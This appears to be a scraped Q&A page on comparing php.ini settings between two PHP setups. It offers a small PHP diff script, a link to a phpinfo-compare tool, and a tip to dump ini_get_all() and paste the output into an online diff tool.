if (count($secondIniDiff) > 0) {
echo '<h1>php.ini.save changes</h1>';
echo '<ol>';
foreach ($secondIniDiff as $key => $val) {
echo '<li> php.ini'.$key.': '.$val.' ----> php.ini.save :'.#$firstIniDiff[$key].'</li> ';
}
echo '</ol>';
}
Output

Found this question by searching and subsequently found a script which does exactly what I wanted (and I expect the OP wanted too).
https://github.com/brettalton/phpinfo-compare
Assuming you have a web server with curl, just put compare.php in a directory and changes the values of $site1 and $site2 to urls that fetch phpinfo and you got yourself a easy to read, pretty print diff. See example on his blog - http://blog.brettalton.com/2012/08/09/phpinfo-compare/

If you just want to compare two php.ini files:
#!/usr/bin/php
<?php
function load($export_script) {
$f1 = file($export_script);
foreach($f1 as $line ) {
if( $line[0] == ';' ) continue;
if( $line[0] == '[' ) continue;
if( trim($line) == "" ) continue;
$var = explode( '=', $line);
$config1[trim($var[0])] = trim($var[1]);
}
return $config1;
}
$export_script = 'php.ini';
$c1 = load($export_script);
$export_script = 'php52.ini';
$c2 = load($export_script);
foreach( $c1 as $key => $val ) {
if( $val == $c2[$key] ) continue;
echo $key.': '.$c1[$key].' // '.$c2[$key]."\n";
}
?>

<?php var_dump(ini_get_all()); ?>
Then take the outputs and paste them into https://www.diffnow.com or your favorite diff-er.

Categories